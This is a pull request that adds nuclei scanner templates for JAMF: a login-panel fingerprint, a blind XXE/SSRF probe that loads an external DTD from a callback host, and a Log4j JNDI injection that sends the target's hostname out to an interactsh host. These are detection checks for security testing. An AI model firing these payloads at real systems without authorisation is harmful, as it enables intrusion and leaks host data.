Merge pull request #3647 from projectdiscovery/jamf

JAMF Templates

exposed-panels/jamf-panel.yaml

@@ -0,0 +1,25 @@
+id: jamf-panel
+
+info:
+  name: JAMF MDM Panel
+  author: pdteam
+  severity: info
+  metadata:
+    shodan-query: http.favicon.hash:1262005940
+  tags: jamf,panel,mdm
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}"
+
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: all
+        words:
+          - "Jamf Pro Login"
+          - "Jamf Cloud Node"
+        condition: or

vulnerabilities/jamf/jamf-blind-xxe.yaml

@@ -0,0 +1,50 @@
+id: jamf-blind-xxe
+
+info:
+  name: JAMF Blind XXE / SSRF
+  author: pdteam
+  severity: medium
+  reference: https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
+  tags: xxe,ssrf,jamf
+
+requests:
+  - raw:
+      - |
+        POST /client HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <?xml version='1.0' encoding='UTF-8' standalone="no"?>
+        <!DOCTYPE jamfMessage SYSTEM "http://{{interactsh-url}}/test.xml">
+        <ns2:jamfMessage xmlns:ns3="http://www.jamfsoftware.com/JAMFCommunicationSettings" xmlns:ns2="http://www.jamfsoftware.com/JAMFMessage">
+          <device>
+            <uuid>&test;</uuid>
+            <macAddresses />
+          </device>
+          <application>com.jamfsoftware.jamfdistributionserver</application>
+          <messageTimestamp>{{unix_time()}}</messageTimestamp>
+          <content xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="ns2:ResponseContent">
+            <uuid>00000000-0000-0000-0000-000000000000</uuid>
+            <commandType>com.jamfsoftware.jamf.distributionserverinventoryrequest</commandType>
+            <status>
+              <code>1999</code>
+              <timestamp>{{unix_time()}}</timestamp>
+            </status>
+            <commandData>
+              <distributionServerInventory>
+                <ns2:distributionServerID>34</ns2:distributionServerID>
+              </distributionServerInventory>
+            </commandData>
+          </content>
+        </ns2:jamfMessage>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "http"
+
+      - type: word
+        words:
+          - "com.jamfsoftware.jss"

vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml

@@ -0,0 +1,38 @@
+id: jamf-log4j-jndi-rce
+
+info:
+  name: JAMF Log4j JNDI RCE
+  author: pdteam
+  severity: critical
+  reference: https://github.com/random-robbie/jamf-log4j
+  tags: rce,jndi,log4j,jamf
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Origin: {{RootURL}}
+        Referer: {{RootURL}}
+        Content-Type: application/x-www-form-urlencoded
+
+        username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol  # Confirms the DNS Interaction
+        words:
+          - "dns"
+
+      - type: regex
+        part: interactsh_request
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
+
+    extractors:
+      - type: regex
+        part: interactsh_request
+        group: 1
+        regex:
+          - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output